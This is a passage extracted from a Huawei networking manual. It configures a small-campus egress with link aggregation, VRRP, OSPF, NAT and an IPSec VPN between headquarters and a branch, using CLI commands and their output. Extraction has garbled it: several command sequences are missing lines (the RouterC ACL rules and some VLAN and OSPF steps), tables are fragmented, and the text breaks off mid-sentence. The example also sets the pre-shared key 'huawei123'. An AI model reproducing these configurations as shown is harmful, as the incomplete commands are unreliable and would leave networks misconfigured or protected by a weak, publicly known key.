22.1 Layer-2 Dual-NGFW Module Deployment, Switch CSS, and Redirection-based Traffic Diversion....................1680
22.2 Layer-3 Dual-NGFW Module Deployment, Switch CSS, and Static Route Traffic Diversion............................. 1692
22.3 Layer-3 Dual-NGFW Module Deployment, Switch CSS, and PBR-based Traffic Diversion............................... 1707
22.4 Layer-3 Dual-NGFW Module Deployment, Switch CSS, and VLAN-based Traffic Diversion........................... 1721
Issue 10 (2016-10-30) Huawei Proprietary and Confidential xv

Typical Configuration Examples 1 Use the Quick Search Tool
1 Use the Quick Search Tool
Click Tools to obtain more documentation tools.
Switch Hardware Query Tool

This tool helps you to quickly query hardware information of switches. You do not need to
register a Huawei account before using this tool.
Switch Hardware Query Tool
Product Feature Query Tool

This tool helps you query the features supported on enterprise networking products such as
switches and routers. You do not need to register a Huawei account before using this tool.
Product Feature Query Tool
Command Query Tool

This tool shows details about commands used on switches. You do not need to register a
Huawei account before using this tool.
Command Query Tool
Alarm Query Tool

This tool shows details about alarms used on switches. You do not need to register a Huawei
account before using this tool.
Alarm Query Tool
Issue 10 (2016-10-30) Huawei Proprietary and Confidential 1

Typical Configuration Examples 2 Comprehensive configuration example
2 Comprehensive configuration example
About This Chapter
2.1 Example for Configuring Egress Devices for Small- and Medium-Scale Campus or
Branch Networks
2.2 Example for Configuring the Egress of a Large-scale Campus (Firewalls Are Connected
to Core Switches in In-line Mode)
2.3 Example for Configuring the Egress of a Large-scale Campus (Firewalls Are Connected
to Core Switches in Bypass Mode)
2.4 Example for Configuring an Agile Campus Network
2.5 Example for Configuring High-Speed Self Recovery on a Subway Bearer Network
2.6 Example for Configuring ACU2 and NGFW on Switches

2.1 Example for Configuring Egress Devices for Small-

and Medium-Scale Campus or Branch Networks
Campus Network Egress Overview
A campus network egress is often located between an enterprise's internal network and
external network to provide the only ingress and egress for data traffic between the internal
and external networks. Small- and medium-scale enterprises want to deploy multiple types of
services on the same device to reduce initial investment on enterprise network construction
and long-term O&M cost. Enterprise network users require access to the Internet and virtual
private networks (VPNs). To reduce network construction and maintenance costs, small- and
medium-scale enterprises often lease the Internet links of carriers to build VPNs. Some
campus networks requiring high reliability often deploy two egress routers to implement
device-level reliability and use reliability techniques such as link aggregation, Virtual Router
Redundancy Protocol (VRRP), and active and standby routes to ensure campus network
egress reliability. Huawei AR series routers can be used as egress devices and work with
Huawei S series switches to provide a cost-effective network solution for small- and medium-
scale campus networks. Campus network egress devices must provide the following
functions:
l Provide the network address translation (NAT) outbound and NAT server functions to
translate between private and public network addresses, so that internal users can access
the Internet and Internet users can access internal servers.
l Support the construction of VPNs through the Internet so that branches of the enterprise
can communicate over VPNs.
l Encrypt data to protect data integrity and confidentiality, ensuring service transmission
security.
l Egress devices of small- and medium-scale campus networks must be reliable, secure,
low-cost, and easy to maintain.
Configuration Notes
l This configuration example applies to small- and medium-scale enterprise campus/
branch egress solutions.
l This configuration example provides only the enterprise network egress configuration.
For the internal network configuration, see "Small- and Mid-Sized Campus Networks" in
the HUAWEI S Series Campus Switches Quick Configuration.
Networking Requirements
The headquarters and branch of an enterprise are located in different cities and far from each
other. The headquarters has two departments (A and B), and the branch has only one
department. A cross-regional enterprise campus network needs to be constructed to meet the
following requirements:
l Both users in the headquarters and branch have access to the Internet. In the
headquarters, users in Department A can access the Internet, but users in Department B
are not allowed to access the Internet. In the branch, all users can access the Internet.
l The headquarters has a web server to provide WWW service so that external users can
access the internal server.

l The headquarters and branch need to communicate through VPNs over the Internet and
communication contents must be protected.
l The headquarters' campus network egress requires link-level reliability and device-level
reliability.
l The branch does not need high reliability.
Solution Overview
A comprehensive configuration solution, as shown in Figure 2-1, is provided to meet the
preceding requirements. The solution adopts a multi-layer, modular, redundant, and secure
design and applies to small- and medium-scale enterprise or branch campus networks.

Figure 2-1 Configuring egress devices for small- and medium-scale campus networks or
branch networks
PC5 PC6 Printer 3
Eth0/0/2
GE0/0/1 SwitchA
GE2/0/0
Enterprise
branch RouterC
GE1/0/0
A
Internet
RouterE
RouterD
B C
Enterprise
GE1/0/0 GE1/0/0
headquarters
OSPF
RouterA RouterB
Area 0
Eth-Trunk1 Eth-Trunk1
VRRP VRID1
Web Server Eth-Trunk3 Eth-Trunk4
GE0/0/5 CORE
Eth-Trunk1
Eth-Trunk1
ACC1 Department B ACC2

Department A VLAN 20
Eth0/0/2 VLAN 10 Eth0/0/2
PC1 PC2 Printer 1 PC3 PC4 Printer 2

l Deploy Huawei S2700&S3700 switches (ACC1, ACC2, and SwitchA) at the access
layer, deploy Huawei S5700 switches (CORE) at the core layer, and deploy Huawei
AR3200 routers (RouterA, RouterB, and RouterC) at the campus network egress.
l In the headquarters, use redundancy between two AR egress routers (RouterA and
RouterB) to ensure device-level reliability. In the branch, deploy one AR router as the
egress router.
l In the headquarters, set up a stack (CORE) between two S5700 core switches to ensure
device-level reliability.
l In the headquarters, deploy Eth-Trunks between access switches, the CORE, and egress
routers to ensure device-level reliability.
l In the headquarters, assign a VLAN to each department and transmit services between
departments at Layer 3 through VLANIF interfaces of the CORE.
l Use the CORE of the headquarters as the gateway for users and servers, and deploy a
DHCP server to assign IP addresses to users.
l Deploy the gateway for branch users on the egress router.
l Deploy VRRP between the two egress routers of the headquarters to ensure reliability.
l Construct an Internet Protocol Security (IPSec) VPN between the headquarters and
branch over the Internet to enable communication while ensuring data transmission
security.
l Deploy Open Shortest Path First (OSPF) between the two egress routers and CORE of
the headquarters to advertise user routes for future capacity expansion and maintenance.
Configuration Roadmap
The configuration roadmap is as follows:
1. Deploy the headquarters and branch campus networks.

In the headquarters, deploy a stack and link aggregation, configure VLANs and IP
addresses for interfaces, and deploy a DHCP server to allow users in the headquarters
campus network to communicate. Users within a department communicate at Layer 2
through access switches, and users in different departments communicate at Layer 3
through the VLANIF interfaces of the CORE.
In the branch, configure VLANs and IP addresses for interfaces on access switches and
egress routers, and deploy a DHCP server to allow users in the branch campus network
to communicate.
2. Deploy VRRP.
To ensure reliability between the CORE and two egress routers of the headquarters,
deploy VRRP between the two egress routers so that VRRP heartbeat packets are
exchanged through the CORE. Configure RouterA as the master device and RouterB as
the backup device.
To prevent service interruption in the case of an uplink failure on RouterA, associate the
VRRP status with the uplink interface of RouterA. The association ensures a fast VRRP
switchover when the uplink fails.
3. Deploy routes.
To steer uplink traffic of devices, configure a default route with the VRRP virtual
address as the next hop on the CORE of the headquarters, and configure a default route
on each egress router of the headquarters and branch, with the next hop pointing to the IP
address of the connected carrier network device (public network gateway address).

To steer the return traffic of two egress routers of the headquarters, configure OSPF
between the two egress routers and CORE, and advertise all user network segments on
the CORE into OSPF and then to the two egress routers.
On RouterD, to steer traffic generated by access to the web server from external
networks, configure two static routes of which the destination address is the public
network address of the web server and next-hop addresses are uplink interface addresses
of the two egress routers. To ensure simultaneous route switchover and VRRP
switchover, set the route with next hop pointing to RouterA as the preferred one. When
this route fails, the route with next hop pointing to RouterB takes effect.
4. Configure NAT outbound.
To enable internal users to access the Internet, configure NAT on the uplink interfaces of
the two egress routers for translation between private network addresses and public
network addresses. Use an ACL to permit the source IP address of packets from
Department A so that users in Department A can access the Internet while users in
Department B cannot.
5. Configure a NAT server.
To enable external users to access the internal web server, configure a NAT server on the
uplink interfaces of the two egress routers to translate between the public and private
network addresses of the server.
6. Deploy IPSec VPN.
To enable users in the headquarters and branch to communicate through a VPN,
configure IPSec VPN between the egress routers of the headquarters and branch for
secure communication.
NOTE
For the enterprise internal network configuration, see "Small- and Mid-Sized Campus Networks" in the
HUAWEI S Series Campus Switches Quick Configuration.
Data Plan
Table 2-1, Table 2-2, and Table 2-3 provide the data plan.
Table 2-1 Data plan for link aggregation of interfaces
Device LAG Interface Physical Interface
RouterA Eth-Trunk1 GE2/0/0

GE2/0/1
RouterB Eth-Trunk1 GE2/0/0

GE2/0/1
CORE Eth-Trunk1 GE0/0/1

GE1/0/1
Eth-Trunk2 GE0/0/2
GE1/0/2
Eth-Trunk3 GE0/0/3
GE1/0/3

Device LAG Interface Physical Interface
Eth-Trunk4 GE0/0/4
GE1/0/4
ACC1 Eth-Trunk1 GE0/0/1

GE0/0/2
ACC2 Eth-Trunk1 GE0/0/1

GE0/0/2
NOTE
All Eth-Trunk interfaces work in Link Aggregation Control Protocol (LACP) mode.
Table 2-2 VLAN plan

Device Data Remarks
RouterA Eth-Trunk1.100: Configure Connects to the CORE of

a dot1q termination sub- the headquarters.
interface to terminate
packets of VLAN 100.
RouterB Eth-Trunk1.100: Configure Connects to the CORE of

a dot1q termination sub- the headquarters.
interface to terminate
CORE Eth-Trunk1: a trunk Connects to Department A

interface that transparently of the headquarters.
transmits packets of VLAN
10.
Eth-Trunk2: a trunk Connects to Department B

interface that transparently of the headquarters.
20.
GE0/0/5: an access interface Connects to the web server

with VLAN 30 as the of the headquarters.
default VLAN.
Eth-Trunk3: a trunk Connects to RouterA of the

interface that transparently headquarters.
100.
Eth-Trunk4: a trunk Connects to RouterB of the

interface that transparently headquarters.
100.

Device Data Remarks
ACC1 Eth-Trunk1: a trunk Connects to the CORE of

interface that transparently the headquarters.
10.
Ethernet0/0/2: an access Connects to PC1 in

interface with VLAN 10 as Department A.
the default VLAN.
ACC2 Eth-Trunk1: a trunk Connects to the CORE of

interface that transparently the headquarters.
20.
Ethernet0/0/2: an access Connects to PC3 in

interface with VLAN 20 as Department B.
the default VLAN.
RouterC GE2/0/0.200: Configure a Connects to SwitchA

dot1q termination sub- (access switch) of the
interface to terminate branch.
SwitchA GE0/0/1: a trunk interface Connects to RouterC (egress

that transparently transmits router) of the branch.
Ethernet0/0/2: an access Connects to PC5 in the

interface with VLAN 200 as branch.
the default VLAN.
Table 2-3 IP address plan

Device Data Remarks
RouterA GE1/0/0: 202.10.1.2/24 GE1/0/0 connects to the

Eth-Trunk1.100: carrier network.
10.10.100.2/24 Eth-Trunk1.100 connects to
the CORE of the
headquarters.
RouterB GE1/0/0: 202.10.2.2/24 -

Eth-Trunk1.100:
10.10.100.3/24

Device Data Remarks
CORE VLANIF 10: 10.10.10.1/24 VLANIF 10 functions as the

VLANIF 20: 10.10.20.1/24 user gateway of Department
A.
VLANIF 30: 10.10.30.1/24
VLANIF 20 functions as the
VLANIF 100: user gateway of Department
10.10.100.4/24 B.
VLANIF 30 functions as the
gateway of the web server.
VLANIF 100 connects to
egress routers.
Web server IP address: 10.10.30.2/24 Public network IP address

Default gateway: 10.10.30.1 translated by the NAT
server: 202.10.100.3
PC1 IP address: 10.10.10.2/24 IP address 10.10.10.2/24 is

Default gateway: 10.10.10.1 allocated to the PC through
DHCP in this example.

Default gateway: 10.10.20.1 allocated to the PC through
DHCP in this example.
RouterD InterfaceB: interface number RouterD is a carrier network

GigabitEthernet1/0/0 and IP device. The interface
address 202.10.1.1/24 number used here is an
InterfaceC: interface number example. When configuring
GigabitEthernet2/0/0 and IP a device, use the actual
address 202.10.2.1/24 interface number.
RouterE InterfaceA: interface RouterE is a carrier network

number device. The interface
GigabitEthernet1/0/0 and IP number used here is an
address 203.10.1.1/24 example. When configuring
a device, use the actual
interface number.
RouterC GE1/0/0: 203.10.1.2/24 -

GE2/0/0.200:
10.10.200.1/24

Default gateway: allocated to the PC through
10.10.200.1 DHCP in this example.
Procedure
Step 1 Configure Eth-Trunks between the CORE and two egress routers of the headquarters.
# Configure the CORE.

<HUAWEI> system-view
[HUAWEI] sysname CORE
[CORE] interface eth-trunk 3
[CORE-Eth-Trunk3] mode lacp
[CORE-Eth-Trunk3] quit
[CORE] interface eth-trunk 4
[CORE-Eth-Trunk4] mode lacp
[CORE] interface gigabitethernet 0/0/3
[CORE-GigabitEthernet0/0/3] eth-trunk 3
[CORE-GigabitEthernet0/0/3] quit
# Configure RouterA (egress router) of the headquarters. The configuration of RouterB is

similar to that of RouterA.
<Huawei> system-view
[Huawei] sysname RouterA
[RouterA] interface eth-trunk 1
[RouterA-Eth-Trunk1] undo portswitch
[RouterA-Eth-Trunk1] mode lacp-static
[RouterA-Eth-Trunk1] quit
[RouterA] interface gigabitethernet 2/0/0
[RouterA-GigabitEthernet2/0/0] eth-trunk 1
[RouterA-GigabitEthernet2/0/0] quit
[RouterA-GigabitEthernet2/0/1] eth-trunk 1
Step 2 Configure VLANs and IP addresses for interfaces.

[CORE] vlan 100
[CORE] quit
[CORE] interface Eth-Trunk 3
[CORE-Eth-Trunk3] port link-type trunk
[CORE-Eth-Trunk3] port trunk allow-pass vlan 100
[CORE] interface Eth-Trunk 4
[CORE-Eth-Trunk4] port link-type trunk
[CORE-Eth-Trunk4] port trunk allow-pass vlan 100
[CORE] interface vlanif 100
[CORE-Vlanif100] ip address 10.10.100.4 24
[CORE-Vlanif100] quit
# Configure RouterA (egress router) of the headquarters. The configuration of RouterB is

similar to that of RouterA.
[RouterA] interface Eth-Trunk 1.100
[RouterA-Eth-Trunk1.100] ip address 10.10.100.2 24
[RouterA-Eth-Trunk1.100] dot1q termination vid 100
[RouterA-Eth-Trunk1.100] arp broadcast enable //Enable the interface to
process ARP broadcast packets. This function has been enabled on AR3200 series
routers running V200R003C01 and later versions by default.
[RouterA-Eth-Trunk1.100] quit
[RouterA-GigabitEthernet1/0/0] ip address 202.10.1.2 24
# Configure RouterC (egress router) of the branch.

[Huawei] sysname RouterC
[RouterC] interface gigabitethernet 1/0/0
[RouterC-GigabitEthernet1/0/0] ip address 203.10.1.2 24
[RouterC-GigabitEthernet1/0/0] quit
Step 3 Deploy VRRP. Configure VRRP between RouterA and RouterB of the headquarters, and
configure RouterA as the master device and RouterB as the backup device.
# Configure RouterA.
[RouterA] interface Eth-Trunk 1.100
[RouterA-Eth-Trunk1.100] vrrp vrid 1 virtual-ip 10.10.100.1
[RouterA-Eth-Trunk1.100] vrrp vrid 1 priority 120
[RouterA-Eth-Trunk1.100] vrrp vrid 1 track interface GigabitEthernet1/0/0 reduced
40
[RouterA-Eth-Trunk1.100] quit
//To prevent service interruption in the case of an uplink failure on RouterA,
associate the VRRP status with the uplink interface of RouterA. The association
ensures a fast VRRP switchover when the uplink fails.
# Configure RouterB.
[RouterB] interface Eth-Trunk 1.100
[RouterB-Eth-Trunk1.100] vrrp vrid 1 virtual-ip 10.10.100.1
[RouterB-Eth-Trunk1.100] quit
After the configuration is complete, a VRRP group should have been set up between RouterA
and RouterB. You can run the display vrrp command to view the VRRP status of the two
egress routers.
# Check that the VRRP status of RouterA is Master.
[RouterA] display vrrp
Eth-Trunk1.100 | Virtual Router 1
State : Master
Virtual IP : 10.10.100.1
Master IP : 10.10.100.2
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Track IF : GigabitEthernet1/0/0 Priority reduced : 40
IF state : UP
Create time : 2015-05-18 06:53:47 UTC-05:13
Last change time : 2015-05-18 06:54:14 UTC-05:13
# Check that the VRRP status of RouterB is Backup.

[RouterB] display vrrp
State : Backup
Virtual IP : 10.10.100.1
Master IP : 10.10.100.2
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101

Check TTL : YES

Create time : 2015-05-18 06:53:52 UTC-05:13
Step 4 Deploy routes.

1. Configure default routes to steer uplink traffic of devices.
# Configure a default route with the VRRP virtual address as the next hop on the CORE.
[CORE] ip route-static 0.0.0.0 0.0.0.0 10.10.100.1
# Configure a default route on each egress router of the headquarters and branch, with
the next hop pointing to the IP address of the connected carrier network device (public
network gateway address).
[RouterA] ip route-static 0.0.0.0 0.0.0.0 202.10.1.1
[RouterB] ip route-static 0.0.0.0 0.0.0.0 202.10.2.1
[RouterC] ip route-static 0.0.0.0 0.0.0.0 203.10.1.1
2. Deploy OSPF. Configure OSPF between two egress routers (RouterA and RouterB) and
CORE of the headquarters so that the two egress routers can learn return routes from
user network segments.
# Configure RouterA (egress router) of the headquarters.
[RouterA] ospf 1 router-id 10.1.1.1
[RouterA-ospf-1] area 0
[RouterA-ospf-1-area-0.0.0.0] network 10.10.100.0 0.0.0.255
[RouterA-ospf-1-area-0.0.0.0] quit
# Configure RouterB (egress router) of the headquarters.

[RouterB] ospf 1 router-id 10.2.2.2
[RouterB-ospf-1] area 0
[RouterB-ospf-1-area-0.0.0.0] network 10.10.100.0 0.0.0.255
[RouterB-ospf-1-area-0.0.0.0] quit

[CORE] ospf 1 router-id 10.3.3.3
[CORE-ospf-1] area 0
[CORE-ospf-1-area-0.0.0.0] network 10.10.100.0 0.0.0.255
[CORE-ospf-1-area-0.0.0.0] network 10.10.10.0 0.0.0.255 //Advertise the
user network segment into OSPF.
user network segment into OSPF.
web server network segment into OSPF.
[CORE-ospf-1-area-0.0.0.0] quit
# After the configuration is complete, an OSPF neighbor relationship should have been
established between Core,RouterA and RouterB. You can run the display ospf peer
command to view the OSPF neighbor status. The following uses the display on the
CORE as an example. You can view that the OSPF neighbor status is Full.
[CORE] display ospf peer
OSPF Process 1 with Router ID 10.3.3.3

Neighbors
Area 0.0.0.0 interface 10.10.100.4(Vlanif100)'s neighbors

Router ID: 10.1.1.1 Address: 10.10.100.2
State: Full Mode:Nbr is Slave Priority: 1
DR: 10.10.100.4 BDR: 10.10.100.3 MTU: 0
Dead timer due in 40 sec

Retrans timer interval: 5

Neighbor is up for 00:26:37
Authentication Sequence: [ 0 ]

DR: 10.10.100.4 BDR: 10.10.100.3 MTU: 0
3. Configure static routes (return routes) from external networks to the public network
address of the internal server.
# On RouterD, configure two static routes of which the destination address is the public
network address of the internal server and next-hop addresses are uplink interface
addresses of RouterA and RouterB. To ensure simultaneous route switchover and VRRP
switchover, set the route with next hop pointing to RouterA as the preferred one. When
this route fails, the route with next hop pointing to RouterB takes effect.
[RouterD] ip route-static 202.10.100.0 255.255.255.0 202.10.1.2 preference
40 //Set the route with next hop pointing to RouterA as the preferred
route.
[RouterD] ip route-static 202.10.100.0 255.255.255.0 202.10.2.2
When the uplink of RouterA is interrupted, the following actions are triggered:
a. VRRP master/backup switchover between two egress routers (RouterA and
RouterB) is implemented through association between the VRRP status and uplink
interface status of the two egress routers.
b. Active/standby switchover between routes from the carrier router RouterD to the
internal server is implemented through the configuration of active and standby
routes on RouterD.
The two actions ensure that the VRRP master/backup switchover and active/standby
route switchover occur simultaneously when the uplink of RouterA is interrupted and
ensure reliability of the incoming and outgoing paths.
Step 5 Configure NAT outbound.
1. Define data flows for NAT translation on the egress routers of the headquarters and
branch.
In the headquarters, only users in Department A can access the Internet using source IP
address 10.10.10.0/24. In the branch, all users can access the Internet using source IP
address 10.10.200.0/24.
# Configure RouterA (egress router) of the headquarters. The configuration of RouterB
is similar to that of RouterA.
[RouterA] acl 3000
[RouterA-acl-adv-3000] rule 5 deny ip source 10.10.10.0 0.0.0.255 destination
10.10.200.0 0.0.0.255 //Configure an ACL to deny the data flow to be
protected by IPSec.
[RouterA-acl-adv-3000] rule 10 deny ip source 10.10.20.0 0.0.0.255
destination 10.10.200.0 0.0.0.255 //Configure an ACL to deny the data
flow to be protected by IPSec.
[RouterA-acl-adv-3000] rule 15 permit ip source 10.10.10.0 0.0.0.255 //
Configure an ACL to permit the data flow for NAT translation.
[RouterA-acl-adv-3000] quit
//On Huawei AR3200 series routers, if IPSec and NAT are configured on the
same interface, NAT translation is performed first. To avoid performing NAT
translation on the data flows to be protected by IPSec, configure ACLs to be
referenced by NAT to deny the data flows to be protected by IPSec.


[RouterC] acl 3000
[RouterC-acl-adv-3000] rule 5 deny ip source 10.10.200.0 0.0.0.255
destination 10.10.10.0 0.0.0.255
[RouterC-acl-adv-3000] rule 10 deny ip source 10.10.200.0 0.0.0.255
destination 10.10.20.0 0.0.0.255
[RouterC-acl-adv-3000] rule 15 permit ip source 10.10.200.0 0.0.0.255
[RouterC-acl-adv-3000] quit
//Configure ACLs to be referenced by NAT to deny the data flows to be
protected by IPSec.
2. Configure NAT on the uplink interfaces of the egress routers of the headquarters and
branch.
# Configure RouterA. The configurations of RouterB and RouterC are similar to that of
RouterA.
[RouterA] interface GigabitEthernet1/0/0
[RouterA-GigabitEthernet1/0/0] nat outbound 3000
3. Verify the configuration.
# After the configuration is complete, run the display nat outbound command to view
NAT configuration. The following uses the display on RouterA as an example.
[RouterA] display nat outbound
NAT Outbound Information:
--------------------------------------------------------------------------
Interface Acl Address-group/IP/Interface Type
--------------------------------------------------------------------------
GigabitEthernet1/0/0 3000 202.10.1.2 easyip
--------------------------------------------------------------------------
Total : 1
Step 6 Deploy a NAT server.
The headquarters has a web server. You need to configure a NAT server on the two egress
routers (RouterA and RouterB) to allow external users to access the internal web server.
# Configure RouterA.
[RouterA-GigabitEthernet1/0/0] nat server protocol tcp global 202.10.100.3 www
inside 10.10.30.2 8080
# Configure RouterB.
[RouterB] interface GigabitEthernet1/0/0
[RouterB-GigabitEthernet1/0/0] nat server protocol tcp global 202.10.100.3 www
inside 10.10.30.2 8080
[RouterB-GigabitEthernet1/0/0] quit
# After the configuration is complete, run the display nat server command to view NAT
server configuration. The following uses the display on RouterA as an example.
[RouterA] display nat server
Nat Server Information:

Interface : GigabitEthernet1/0/0
Global IP/Port : 202.10.100.3/80(www)
Inside IP/Port : 10.10.30.2/8080
Protocol : 6(tcp)
VPN instance-name : ----
Acl number : ----
Description : ----

Total : 1
Step 7 Deploy IPSec VPN so that the headquarters and branch can communicate through the VPN
over the Internet and data communication can be protected.
1. Configure ACLs to permit the data flows to be protected by IPSec.
[RouterA] acl 3001
[RouterA-acl-adv-3001] rule 5 permit ip source 10.10.10.0 0.0.0.255
destination 10.10.200.0 0.0.0.255 //Configure an ACL to permit the data
[RouterA-acl-adv-3001] rule 10 permit ip source 10.10.20.0 0.0.0.255
destination 10.10.200.0 0.0.0.255 //Configure an ACL to permit the data
[RouterA-acl-adv-3001] quit

[RouterB] acl 3001
[RouterB-acl-adv-3001] rule 5 permit ip source 10.10.10.0 0.0.0.255
destination 10.10.200.0 0.0.0.255
[RouterB-acl-adv-3001] rule 10 permit ip source 10.10.20.0 0.0.0.255
destination 10.10.200.0 0.0.0.255
[RouterB-acl-adv-3001] quit

[RouterC] acl 3001
destination 10.10.10.0 0.0.0.255
destination 10.10.20.0 0.0.0.255
[RouterC-acl-adv-3001] quit
2. Configure an IPSec proposal.

# Configure RouterA (egress router) of the headquarters. The configurations of RouterB
and RouterC are similar to that of RouterA.
[RouterA] ipsec proposal tran1
[RouterA-ipsec-proposal-tran1] esp authentication-algorithm sha2-256 //
Configure the authentication algorithm used by ESP.
[RouterA-ipsec-proposal-tran1] esp encryption-algorithm aes-128 //
Configure the encryption algorithm used by ESP.
[RouterA-ipsec-proposal-tran1] quit
3. Configure an IKE proposal.

# Configure RouterA (egress router) of the headquarters. The configurations of RouterB
and RouterC are similar to that of RouterA.
[RouterA] ike proposal 5
[RouterA-ike-proposal-5] encryption-algorithm aes-cbc-128
[RouterA-ike-proposal-5] quit
4. Configure an IKE peer.

[RouterA] ike peer vpn v1
[RouterA-ike-peer-vpn] pre-shared-key cipher huawei123
[RouterA-ike-peer-vpn] ike-proposal 5
[RouterA-ike-peer-vpn] dpd type periodic //Configure periodic dead peer
detection (DPD).
[RouterA-ike-peer-vpn] dpd idle-time 10 //Set the idle time for DAD to 10
seconds.
[RouterA-ike-peer-vpn] remote-address 203.10.1.2
[RouterA-ike-peer-vpn] quit


[RouterB] ike peer vpn v1
[RouterB-ike-peer-vpn] pre-shared-key cipher huawei123
[RouterB-ike-peer-vpn] ike-proposal 5
[RouterB-ike-peer-vpn] dpd type periodic
[RouterB-ike-peer-vpn] dpd idle-time 10
[RouterB-ike-peer-vpn] remote-address 203.10.1.2
[RouterB-ike-peer-vpn] quit

[RouterC] ike peer vpnr1 v1
[RouterC-ike-peer-vpnr1] pre-shared-key cipher huawei123
[RouterC-ike-peer-vpnr1] ike-proposal 5
[RouterC-ike-peer-vpnr1] dpd type periodic
[RouterC-ike-peer-vpnr1] dpd idle-time 10
[RouterC-ike-peer-vpnr1] remote-address 202.10.1.2
[RouterC-ike-peer-vpnr1] quit
[RouterC] ike peer vpnr2 v1
[RouterC-ike-peer-vpnr2] pre-shared-key cipher huawei123
[RouterC-ike-peer-vpnr2] ike-proposal 5
[RouterC-ike-peer-vpnr2] dpd type periodic
[RouterC-ike-peer-vpnr2] dpd idle-time 10
[RouterC-ike-peer-vpnr2] remote-address 202.10.2.2
[RouterC-ike-peer-vpnr2] quit
5. Configure a security policy.

[RouterA] ipsec policy ipsec_vpn 10 isakmp
[RouterA-ipsec-policy-isakmp-ipsec_vpn-10] security acl 3001
[RouterA-ipsec-policy-isakmp-ipsec_vpn-10] ike-peer vpn
[RouterA-ipsec-policy-isakmp-ipsec_vpn-10] proposal tran1
[RouterA-ipsec-policy-isakmp-ipsec_vpn-10] quit

[RouterB] ipsec policy ipsec_vpn 10 isakmp
[RouterB-ipsec-policy-isakmp-ipsec_vpn-10] security acl 3001
[RouterB-ipsec-policy-isakmp-ipsec_vpn-10] ike-peer vpn
[RouterB-ipsec-policy-isakmp-ipsec_vpn-10] proposal tran1
[RouterB-ipsec-policy-isakmp-ipsec_vpn-10] quit

[RouterC] ipsec policy ipsec_vpn 10 isakmp
[RouterC-ipsec-policy-isakmp-ipsec_vpn-10] security acl 3001
[RouterC-ipsec-policy-isakmp-ipsec_vpn-10] ike-peer vpnr1
[RouterC-ipsec-policy-isakmp-ipsec_vpn-10] proposal tran1
[RouterC-ipsec-policy-isakmp-ipsec_vpn-10] quit
[RouterC] ipsec policy ipsec_vpn 20 isakmp
[RouterC-ipsec-policy-isakmp-ipsec_vpn-20] security acl 3001
[RouterC-ipsec-policy-isakmp-ipsec_vpn-20] ike-peer vpnr2
[RouterC-ipsec-policy-isakmp-ipsec_vpn-20] proposal tran1
[RouterC-ipsec-policy-isakmp-ipsec_vpn-20] quit
6. Apply an IPSec policy group to an interface.

# Apply an IPSec policy group to GE1/0/0 that connects RouterA to RouterD.
[RouterA-GigabitEthernet1/0/0] ipsec policy ipsec_vpn
# Apply an IPSec policy group to GE1/0/0 that connects RouterB to RouterD.

[RouterB] interface GigabitEthernet1/0/0
[RouterB-GigabitEthernet1/0/0] ipsec policy ipsec_vpn
[RouterB-GigabitEthernet1/0/0] quit

# Apply an IPSec policy group to GE1/0/0 that connects RouterC to RouterD.

[RouterC] interface GigabitEthernet1/0/0
[RouterC-GigabitEthernet1/0/0] ipsec policy ipsec_vpn
[RouterC-GigabitEthernet1/0/0] quit
# After the configuration is complete, run the display ike sa command to view
information about the security association (SA) established through IKE negotiation.
[RouterC] display ike sa
Conn-ID Peer VPN Flag(s) Phase
---------------------------------------------------------------
7 202.10.2.2 0 RD|ST 2
4 202.10.2.2 0 RD 2
2 202.10.2.2 0 RD 1
6 202.10.1.2 0 RD|ST 2
5 202.10.1.2 0 RD 2
3 202.10.1.2 0 RD 1
Flag Description:
RD--READY ST--STAYALIVE RL--REPLACED FD--FADING TO--TIMEOUT
HRT--HEARTBEAT LKG--LAST KNOWN GOOD SEQ NO. BCK--BACKED UP
# After the configuration is complete, run the display ipsec sa command to view SA
information. The following uses the display on RouterC as an example.
[RouterC] display ipsec sa
===============================
Interface: GigabitEthernet1/0/0
Path MTU: 1500
===============================
-----------------------------
IPSec policy name: "ipsec_vpn"
Sequence number : 10
Acl Group : 3001
Acl rule : 5
Mode : ISAKMP
-----------------------------
Connection ID : 5
Encapsulation mode: Tunnel
Tunnel local : 203.10.1.2
Tunnel remote : 202.10.1.2
Flow source : 10.10.200.0/255.255.255.0 0/0
Flow destination : 10.10.10.0/255.255.255.0 0/0
Qos pre-classify : Disable
[Outbound ESP SAs]

SPI: 969156085 (0x39c425f5)
Proposal: ESP-ENCRYPT-AES-128 SHA2-256-128
SA remaining key duration (bytes/sec): 1887313920/1521
Max sent sequence-number: 8
UDP encapsulation used for NAT traversal: N
[Inbound ESP SAs]

SPI: 1258341975 (0x4b00c657)
Max received sequence-number: 10
Anti-replay window size: 32
-----------------------------
Acl Group : 3001
Acl rule : 10

Mode : ISAKMP
-----------------------------
Connection ID : 6
Flow source : 10.10.200.0/255.255.255.0 0/0
[Outbound ESP SAs]

SPI: 4217384908 (0xfb602fcc)
[Inbound ESP SAs]

SPI: 654720480 (0x27063de0)
-----------------------------
Acl Group : 3001
Acl rule : 5
Mode : ISAKMP
-----------------------------
Connection ID : 4
Flow source : 10.10.200.0/255.255.255.0 0/0
[Outbound ESP SAs]

SPI: 240759500 (0xe59b2cc)
[Inbound ESP SAs]

SPI: 3888073495 (0xe7bf4b17)
-----------------------------
Acl Group : 3001
Acl rule : 10
Mode : ISAKMP
-----------------------------
Connection ID : 7
Flow source : 10.10.200.0/255.255.255.0 0/0

[Outbound ESP SAs]

SPI: 2751917383 (0xa406ed47)
[Inbound ESP SAs]

SPI: 739146604 (0x2c0e7b6c)
Step 8 Verify the configuration.
# Run the ping command to test the connectivity between the headquarters and branch.
PC1>ping 10.10.200.2
Ping 10.10.200.2: 32 data bytes, Press Ctrl_C to break

From 10.10.200.2: bytes=32 seq=1 ttl=126 time=140 ms
--- 10.10.200.2 ping statistics ---

5 packet(s) transmitted
5 packet(s) received
0.00% packet loss
round-trip min/avg/max = 140/184/266 ms
PC3>ping 10.10.200.2


0.00% packet loss
The preceding command output shows that PC1 and PC5, and PC3 and PC5 can communicate
with each other, and the headquarters and branch can communicate through the VPN over the
Internet.
# Verify the connectivity between departments of the headquarters and the Internet. In the
following example, ping the public network gateway 202.10.1.1 of the headquarters from PC1
and PC3.
PC1>ping 202.10.1.1



0.00% packet loss
PC3>ping 202.10.1.1

Request timeout!
Request timeout!
Request timeout!
Request timeout!
Request timeout!

100.00% packet loss
The preceding command output shows that users (such as PC1) in Department A can access
